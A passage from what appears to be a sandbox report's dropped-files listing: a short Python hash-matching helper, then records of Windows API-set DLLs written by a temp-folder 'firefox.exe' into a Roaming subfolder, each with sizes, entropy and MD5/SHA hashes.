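        digest = rec.get("SHA-256")
        if digest:
            by_hash[digest.upper()].append(rec)
    return by_hash


def find_restaged(records):
    """(source_path, destination_path, sha256) for every file whose bytes
    reappear under another path written by a different process. Listing
    order is kept, so the earlier (staging) record is reported as source."""
    hits = []
    for digest, recs in sorted(group_by_sha256(records).items()):
        for i, src in enumerate(recs):
            for dst in recs[i + 1:]:
                if src["path"] != dst["path"] and src.get("Process") != dst.get("Process"):
                    hits.append((src["path"], dst["path"], digest))
    return hits


def unmatched_under(records, dir_prefix):
    """Paths under dir_prefix whose SHA-256 occurs nowhere else in the parsed
    set: their origin must be found elsewhere in the report, not in this slice."""
    by_hash = group_by_sha256(records)
    prefix = dir_prefix.lower()
    return [
        rec["path"]
        for rec in records
        if rec["path"].lower().startswith(prefix)
        and len(by_hash[rec.get("SHA-256", "").upper()]) == 1
    ]


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for src, dst, digest in find_restaged(recs):
        print(f"{digest[:12]}...  {src}  ->  {dst}")
    for path in unmatched_under(recs, r"C:\Users\user\AppData\Roaming"):
        print(f"no staged copy in parsed slice: {path}")
```

Run against the whole "Created / dropped Files" section rather than the five embedded records, the same two functions give the full map of which installer-staged is-*.tmp files end up under AppData\Roaming\F48A04623C4E0000 and which Roaming files have no source in the listing at all. api-ms-win-core-file-l1-1-0.dll is reported as unmatched only because its Temp counterpart is not among the five embedded records.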

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-console-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18624

Entropy (8bit): 7.081899405376927

Encrypted: false

MD5: F4604E259459F5A0D5BE6914A6D4C5FB

SHA1: E17011A4C93F88D558A3DD606D99E78FC58837E2

SHA-256: BCE066193FEB60B08EDF4CBEB490AAAA5DFFEB8A63A720CADF948748A9AF4B8F

SHA-512: 3320207D4E2B25C0B77062DF7A7D9761CA04E92D08E1435F2FA0CD040C7631C02BADDC8926475AE109284BC78DA5C16840B439D29A17C47792123350746E2461

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-datetime-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 17600

Entropy (8bit): 7.201487233811755

Encrypted: false

MD5: E205DE17A85B0C3352A6857EF9B3C6DD

SHA1: 5FE8A292A9D6653136F612FE2C9B45F2F1B08C96

SHA-256: 29B23370474BE0C459CC47863603167CC7191F58318BD29877225FCBF2454215

SHA-512: 6279922FCB3ACCBAC15406815DDC557735346245172285CF1C368434B45C9EFBAFDF8215CE6112292BFD4B2C8EB4642A0560CAE17337D6F51D86137C41B12D6C

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-debug-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 17600

Entropy (8bit): 7.2077822511556215

Encrypted: false

MD5: 405BB6A7CD56CBF5276C3A8DC631963D

SHA1: B4CF791ACE3F6790D45B54A0E6AEB6EBAC748C97

SHA-256: F654E56C4299F507BC34271B6BAA29290FD4919B853E17D7470596CAD779F063

SHA-512: EC892ECE3EB6A211BB8A03F5C5FEBDC4D2F6667079E38A17E3D59195D519E95B03063A3957D4F1180B232A67A2487F8A2D3D2F9312390FEABBD78FADAD1E9FD4

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-errorhandling-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18104

Entropy (8bit): 7.131532401171639

Encrypted: false

MD5: 9A4FC3727AAF02C3285B47DF5EE56244

SHA1: F88E1EA0BA66D1615D7E1D53C95D8E8DBE6BEBE0

SHA-256: 891CCFEB349116283326262C27B8894B43CDC89B8AFD5BA7D21B891814A68075

SHA-512: 3025CCF26BAB11AEC6476C8091968EA040BB37BD9244F6F9DD4AF0FB79D543266420876A64A9FDCDEEA0BB10932E416EF6909D6ECBAF6577D7AE86F17A71E4B9

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 21696

Entropy (8bit): 7.0116845824999805

Encrypted: false

MD5: 6B937FE1EFF0E440B124BBB9334DF34D

SHA1: AB3982AB9D46BAA67B1D59728BC6E93C45872B2B

SHA-256: 71C87C14BC1BD0B20D9F68D4943E93C4C6DDC1B6CF252938BB15FE562552F93E

SHA-512: 13D58EACBAC1D97F780BDF87A29CEEA047F6AC1002C6D79FC661FE7AA759C654BA14842D840887B41C48A15E06ED8358FC1A7E124DD6123D2145F1254364B82F

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l1-2-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18112

Entropy (8bit): 7.106107140155806

Encrypted: false

MD5: EA4AE42721460002DC31515F295AD1C4

SHA1: 8A970D589AA4C178083EE8FB65798A6DDECDC1CF

SHA-256: 668F91E94E76DB4457184909E6A1AB4655E81A8EF37DC37B4ECFE93146C29A88

SHA-512: 5EA1F2FB8BE9FFDF80250B47A440DDB3A41E46A8CE73B6F4834E59CB8D30A1B474F6A33D716EFA43AC7EE52D37AC941F3D51021792B9D1439C831B8A368781B9

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l2-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18112

Entropy (8bit): 7.1620766534253555

Encrypted: false

MD5: AD895B2A99A3EC18F1690BBAC1E2037A

SHA1: 19FAB11CA8D2AB4A3C1A863209CBDC77A69E1AED

SHA-256: A11C772B2451B0C9C706B03381819E4A1DEF3E2FBBBA8362509BBE57DBD5C666

SHA-512: D021A5B8451BB8BAC27B4F496A1A25E0A2B2F90C93A7E27850303C5FEB9441F9B926B13EF024C176827E190F2DC04F401205983510DFAB0946674D18994BBE8F

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-handle-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18112

Entropy (8bit): 7.1097867214760235

Encrypted: false

MD5: 0A0084D4B3635E4D8EBAB587DCFCC16C

SHA1: 5619483328D58AD6B4D2A8A860DABED1BBDB8091

SHA-256: 5089484C8C56AC8E095CADC3DC971DF71EDEB52F856940632821FD37E81AE5CA

SHA-512: D50989131E3B66335F9972E46D056FF1CE585AC90877C388B35BC66E285D24CC4FBC6688F62543CAF3DF86D3E3D1087BDC2822C9F69B0978E35BB727FE47B58B

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-heap-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18112

Entropy (8bit): 7.177990634000795

Encrypted: false

MD5: 0AEAF9CE58CBD0AF1E30D03B45C21F81

SHA1: 1EC04DCA23EB4D28861A16D5CCA0D4FEB91E2E32

SHA-256: 9A5952C82CBCB1A8ECE9C51C258667D9AB96D13EC6455873999FF0BF78C3CAB0

SHA-512: 49F9D30694F6C272E6CB84F71B3801DFF5256D25AC9479ACC6577038783E8B62E36BD0A5A8D07E618830E64749F92DEE0454DD88E132B333D558319FB282EF7A

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-interlocked-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18104

Entropy (8bit): 7.190985597083441

Encrypted: false

MD5: 13BBF7740AFC464172B00F9638BC4F81

SHA1: A92D84A10B161342FCF0E51AD1C287F9B8890525

SHA-256: FF482F69F2183B5FD3C1B45D9006156524B8F8A5F518E33D6E92EA079787E64D

SHA-512: F572E67384EF07790AAAEC8C8E5CAB6C4E9ED954CAF95033CB31121185780A9CD74A5AB123F744F1AE7F889D8DFC9F8AA3BE70999224FD6A1A37FF27BD8AB0D0

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-libraryloader-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18624

Entropy (8bit): 7.128506970533883

Encrypted: false

MD5: 8F239C629F09E1B49CF1F03304AB8E69

SHA1: D54DBE7E79A8389B3BAE3273487BC22D4B99781A

SHA-256: D8D74FB87F94A587582D56934816362B992B712E47C39F13D957058F17724886

SHA-512: 130D1BB38C757BBCE7B3C558624028C771FA1198B8D02F0BE1F210A688E5779F8FCBB44154678E898D6FBA4EC31D03664CC84D063816E977361D4ECABAD7911E

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-localization-l1-2-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 20672

Entropy (8bit): 7.088938940487771

Encrypted: false

MD5: 41A0D67BA3833D230F1229FF058BE057

SHA1: A66FDA76D97D059067F11C3E03869A1B9DA439A0

SHA-256: 4F11443A2FA6C714D3E33597F0D08DE4E11A6A2FDB7DE2E4A01ADDD5977665C5

SHA-512: A4138CC25AC899059A702F4E078E7662F15B7059089E53B6EB1A78A1BBEBC03704421BDD0A5FCBDFFD48BE2842D587E4E3E56D881F0462F60CDDC5C75FC14F2F

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-memory-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18624

Entropy (8bit): 7.096735184430082

Encrypted: false

MD5: 536F07C04C316AAC61AB64A492ED9191

SHA1: 0A2F45D0BA54C4FB5DECBB111BBCC9088FC3269E

SHA-256: 50BF87DA10AE3F442C457E42D6666993B0FCA7C5D4DF521E8CD0959995FBCDDC

SHA-512: B0EC28B75761494A6121C56811DABC297B8E1EA1D56EE4B06A4488D36C16BD26015F2CE945BF9F74B455864828D321AF5DD8B66F839A047458A98984B9343819

Malicious: false

Reputation: low


C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-namedpipe-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18112

Entropy (8bit): 7.167129892042716

Encrypted: false

MD5: 87B1814412CDAC3D08FAD8DD3A79EBAD

SHA1: CA1946721D023BE9825A5AFAC4364248A56111E1

SHA-256: 2F4690B3C2587C0BFB81AB701D50E497406994613151FAF007423C59CA5E2281

SHA-512: 999D6EEB454760A422FAB3B1F1D3DE6B99789838FDFE88F78A3AF52842672F67BB4CA05AE157BF68CEE6D96A1F4B0924555DA67A4FFAD9DB9044E411E071D206

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processenvironment-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 19136

Entropy (8bit): 7.06770071137197

Encrypted: false

MD5: 87E0EF2D5DF6F6E18E6EA9171E3D77E7

SHA1: EB6A1D8D169A683BD1357877AC94BFC98799FEEB

SHA-256: 9B5A5536AED84D45A00DA1056AF4762FEC805EABA742C6BF2D2FCA60993711BB

SHA-512: AB0CB69F13793604E7D3BB97D6CEE38CCA0CDB4889C10F228119713902211C0AEB8A493307FAAC614D05A669BD2E172D83C0AED494751D50DE1874D4AA90D379

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processthreads-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 20160

Entropy (8bit): 7.084664816938566

Encrypted: false

MD5: 066874FF22E1C100DC56C4AE76D2E1C2

SHA1: 896031A6BB845525A6AAB4B56A4DB2805E797A65

SHA-256: 979FF0E25E7EA00B8714C9EF2DC8417E69AFAC137EA88F77F8F5A9FFEAA31923

SHA-512: 0DCF7F1956C980CDBBA6279C7E4D80F30D85AA37D3507166E0B67F008FCFABD00CB8E27532A362218EF3EBF66D92CA3D97A23D1028B83DFFE36AA6E953F3D83E

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processthreads-l1-1-1.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18624

Entropy (8bit): 7.107805652186164

Encrypted: false

MD5: F43A8E9CD787B6D91BB29DBB8EB1A4E5

SHA1: 336B61853627E6E64A10FBB930577D30334E615E

SHA-256: 5BACBBE62E36AD0F6D7742E70361F26BC56A44DBD28CC0291F588420E0C218A6

SHA-512: 1FDC1170907346EF0ECED900DE9091136A6626C4BFC8B4416DFEBBE356F35F9C2BE0D2CF6C37E3DD231F3DB8B5A3AFE8973F15A45544C0C1C10682FE03911616

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-profile-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 17600

Entropy (8bit): 7.186846642215803

Encrypted: false

MD5: A616102234EC5AB394FF1C77DA34F6C0

SHA1: 51E54AAFF7F4902B40E657F31775E50000F8240A

SHA-256: 619E5120BFDD11461672CE8798DA00166E57C528B9AFD80404D2C9CBE87E2C07

SHA-512: C360C045D7CCC3D61FFDF35C3253D7F9C59A759A2EE1583519405D2751C12BACC7B26FA383EB53A0156797905F16F26E28293944A0CA31955E03CC07412F822C

Malicious: false

Reputation: low


C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-rtlsupport-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 17600

Entropy (8bit): 7.194045699834861

Encrypted: false

MD5: 0AE94670FBD69ED5F8C923B75CE2C0BD

SHA1: ED53B6E73B867E23881244926B0DEA1524515672

SHA-256: 6D541B215CFA452E54DC6AF9317A7FC24043FA465EF2B561E0F245A4870B2705

SHA-512: 64886E61537830F013A576E40F83D5BC057EFBAB1F3839D5F30A98CBEAAE62F916EF2AFBA6EC9F7CEFDA89907DDA9F704105CAE59CB880F8148F34F3F011562B

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-string-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18112

Entropy (8bit): 7.133848449054411

Encrypted: false

MD5: 4C745DC13735B4822FF160CB18B61E22

SHA1: CDC23598548A2F1CBF9AC2BA1003B6D6AF0471D0

SHA-256: 550D4FC902F25F2A0C09F475B5CECEE43FB3A0A042126479560B0001DB5C4891

SHA-512: C4AC87FCD7F2130651C69D939929C013E663EB14502452808AB887A735F3DE34EF28E9C98491C3D427B936D3E53C2840F3195ED6EE62D10730DA29267D78149B

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-synch-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 20160

Entropy (8bit): 7.045772919081531

Encrypted: false

MD5: A0DFBD2A68A979D1152E2B9153BB497B

SHA1: 9BE79E52750719AD7B014F803CCF1C8D04C932DE

SHA-256: BFF7EA28E198C7DBEE45D35FD98AE03696E9E252D46BEC9FF7B7823CBA1681F1

SHA-512: 238239FFC9034618DEC8161E15CBDD3B727F1615EF057193C95CED158DD42D876398CFC4854CB790B9DF0EA999F53A980D475ED4827335880D2A47CEA10BD7B5

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-synch-l1-2-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18624

Entropy (8bit): 7.135353533119842

Encrypted: false

MD5: 2674310F6FC087862B215B26A5D6DA5B

SHA1: 6E226A29124716FB6C5C54CBBF3C2B6F727C9E5A

SHA-256: E29EAA099BE15958CB65D03D47959CAE2DAC342402856C5F0E4DA672193C329D

SHA-512: 86964E2A71A32D7FD0C6F3061ECBE66DD10D4938E0F5E3572F962B53107524259F62001BDFF7E4C9173A6B8270F46B76C1037DC69B8343F10E4B4E59BD8D6782

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-sysinfo-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 19136

Entropy (8bit): 7.06799010155914

Encrypted: false

MD5: 1A16AB59D63A2D6A37D3ABD032958631

SHA1: FC76579F19ABB0F24E1AFEA30E1C85FFED6CBC0F

SHA-256: 81926C2B97A7B01061C5042DA0005F0B64FE9E07852478B2A65E8A8EB5560B1F

SHA-512: F3808B1566193AA9024B30477A530CD616174E8B310D455A368F89B2BC6C90D998F4CC611030F7801CBBEB3598DDF78968D628C56C44ED1631A3262159AFD4D7

Malicious: false

Reputation: low


C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-timezone-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18112

Entropy (8bit): 7.169892235758202

Encrypted: false

MD5: FD14FCD1550F17701FBF239645B606FA

SHA1: 0D7B1DE80DB94DABAD3CE91D31FDA1A8A1A6CFAB

SHA-256: A5453CD2B5E98D40CA17DD20A8F5974F29DE7236A076867A3BC3CBCA441BE928

SHA-512: 162559D9E6E36BFFE32BE41F75075E711E6947ADAB2AD3BB37CF03E02E787AD5A6F3FB93AF4B6C3F82E1107DC401D32DBD53FCBA39F85839910E852C1109DB5B

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-util-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18112

Entropy (8bit): 7.094588451141472

Encrypted: false

MD5: 1B5A116DAF8D01FDD0488666803DB17F

SHA1: DA47F3A722A75AE04662B5A6C486DEC6AE7379EA

SHA-256: 48D491B08D395A8AC47CC22A70D1C3F5E84D716AFE2678E825F24492E8FF2ED4

SHA-512: 4E4FDF0AEF5DD17F314A4B93AE521FD3E9E6B5C06EE17688DDEB280BA5C42FC72C75DB745B83ECEB740E5A747C0ABE07627457D6CCB0692DC5E65C96BDE96509

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-conio-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 19136

Entropy (8bit): 7.07970746470874

Encrypted: false

MD5: 93FD7C2F4A8007521E2D1A73B6C21E6F

SHA1: FA2F6A112876613C8DB0276644F229F0C13EDAD1

SHA-256: 3737D7875668EB4812AB01FE82226D758D480128C76BC234806BFD40694CF048

SHA-512: 2390C17625E3377980E0B267E14EF572CF0E88F30A392C7E64A941F2FA98ED9D054B06ADC583FB44CD777D610F7F3CC4D5D26982D297D7DF938263F92AD5A876

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-convert-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 22208

Entropy (8bit): 6.921271327164854

Encrypted: false

MD5: BC0BE695E63548171105C57D2E9B98E7

SHA1: 0C4506B330487C4B45900B06DFE0A3249F6B9D88

SHA-256: D16C5B0E19870E86354B5E6CDC4C81E80777749F6BBE6B675F680CEC0FFAE35D

SHA-512: 095EF210F55233A0C0EB80FC2D94646DE96CB2E66D1994D631FA82E5A71A5C26B32D33ABC19AC69E64BD3E4789EB1A7595818A90494038EA1771C210CD81CB2A

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-environment-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18624

Entropy (8bit): 7.081538661952178

Encrypted: false

MD5: 6BFBF95B7253F32A77BACDF119B678F3

SHA1: 3E3522A9D62940E1E3C0ED6F785AF0B5E3A33600

SHA-256: 9FC2486ED5D3FFF78DEB69A7386F4575451D43B67F759AFB056AC66B82041E3D

SHA-512: 603A5A199A19028B2E496051772517C488FD3FCC05DD6BEC51E15C58DAD2981F7DAB44C3D7E1BE836AFE8F3CF35AC90E574F0062737C353079E33096DBA26F10

Malicious: false

Reputation: low


C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-filesystem-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 20160

Entropy (8bit): 7.084485679603242

Encrypted: false

MD5: 07BA5F40C64134E5749DF0E8CFEE082E

SHA1: 5B872A7EA316B6B3BA604B88045B9B6F34BA4C8B

SHA-256: 136E5DE4B535AABF6368C06F82339D2EF6C34165661F40433BCEF4EBB90B30FE

SHA-512: 55B5C739D08F5627D9453709CC0D3D20C3FC08E9A1168F70381B49F8FDC8D91F15DB85DB51D47AAAE612CBE920BB3BA83075E74888B2D62E3A962F181B3D2C12

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-heap-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18624

Entropy (8bit): 7.163311181625049

Encrypted: false

MD5: CB4E401CE4FC657CCEBB85F96840CC8B

SHA1: 359910F84B5FAF0D194D534C2F631DB5074EA28D

SHA-256: B90BFFA9E03FFD4ECF1D0D709C60F61D13490E84C4550EF06586BC9B1024ED00

SHA-512: 382DF8909DC347DD86696756CD22650EE9BE45146FFDF3B400DA4E370C7C42BCDD4C7FDB807E5A9161211B975B9750EE6CB2B2E2132AAD9D3F90DB9956C2275E

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-locale-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18624

Entropy (8bit): 7.132065899718217

Encrypted: false

MD5: B53D96644F5774FE29BA8BB12D6E5F66

SHA1: 260CBBADA90E29EE8E308996E973CE635496D53C

SHA-256: BE19250A19ED49CE247999D6F0B953EDC2AB7C66B46F1CFBD0C24BE91B84B297

SHA-512: E894CAE26EA86325A9012EC2A00086E136AFE64F38F8DA8B3C5EE1CCAD87B1DCF502AD41E050C1ECFBC1C45D2C69A3C35C5322765EF92DDAF00E5E9953F3436F

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-math-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 28864

Entropy (8bit): 6.66295566360206

Encrypted: false

MD5: 49A69484B524C6F9FD641E015DD15154

SHA1: F6EC9E38D05ED66E8431B909ABA0451EF8C9B540

SHA-256: 69C637C0BE7DDFE0690D8C642EC6D0850085617C3C3DDA9531CAC818F06F66E8

SHA-512: 802D186F4B580541916C038999C0653765F2CB01C345549F6D927F7688B671B234C7EE05F2A9EBA6C139F25C459E579DA4437EE2AC03ED3FE3EBEF849F178553

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-multibyte-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 25792

Entropy (8bit): 6.781766293773302

Encrypted: false

MD5: 66F65B59DFF2F8927DC3C8045D8C3A0A

SHA1: AE459D1B4D6615587D8B9133EC72162C717287FC

SHA-256: 414A2BD84B042E2CCF758270647BCFA02D78EB0125C0584DD53F7245481D66B9

SHA-512: 4FA559F7E3B423A736081A67C8A19084288A870307547B19B2DCCAD935AFDC56311A2045CEB4791D1CA33A05F7F1F906C21363A2076436431A118667F298D577

Malicious: false

Reputation: low


C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-private-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 72896

Entropy (8bit): 5.834415075746363

Encrypted: false

MD5: BF090F2290C18F96FD359A6596EA4233

SHA1: BA1FD71AEFFB0E9629CF0DDC5D5E4704627FB0E5

SHA-256: 5710E3ED5819CCAA9CF558AB57534BC880C610C06F2A44ADFAFBFAB5BFC38C2B

SHA-512: 01B3D02B6FB7B6ED7302903D8E2937372A5BA582755CCD73D4FAE2B904F278BD4F38C3C2B0CC12F7DA8AC4DBE204976CFB492D8AFE7497F39B800ADC652BAC64

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-process-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 19136

Entropy (8bit): 7.067790575145041

Encrypted: false

MD5: E4D419A1897B507E01F75EF88457979F

SHA1: 5C769D5E7FCECBF384D09F340E7DCEB951A2F9C6

SHA-256: 3A2355A23874342777391B4A06C5CDCD990DED287CC4A27FDF0A071AC3B229AD

SHA-512: 65EDB60FD6E897EE2AC74976C47A8B55B8C45BB707C8F1134D78517D0883A16634A3C6142F3A925BE0441D594EEBE90149675D38E4A8DF23D6A68F163F60E611

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-runtime-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 22720

Entropy (8bit): 6.942253423928934

Encrypted: false

MD5: 11218C9F81404A51D1EB6B56BA60F9AB

SHA1: ACC303D1B1A5822ED7BCF8F666860A0A7AAFFE91

SHA-256: 882DA90B6368056908E9CD21C4719A016E9A3CA597ECA9183892A5806B4A8D4A

SHA-512: 86928D70AEC7BD7170863C0CDEA110F8A4AA244EFB30577310AD1908D71817B8A2AEB45833D5F710B15DF8FE096234CFB069819B0F2B706CFCD15B5614615929

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-stdio-l1-1-0.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 24256

Entropy (8bit): 6.86072682024164

Encrypted: false

MD5: D67520BFF673CAB4B2ED1AF12DE37A1F

SHA1: 752DEACC54982012852E68C37253E95B8BB89AEE

SHA-256: 44BBB2AEC747E1CBC63FC7C4D2E8C5EC1CA9F9D026835AC2CCB0D60971B6107A

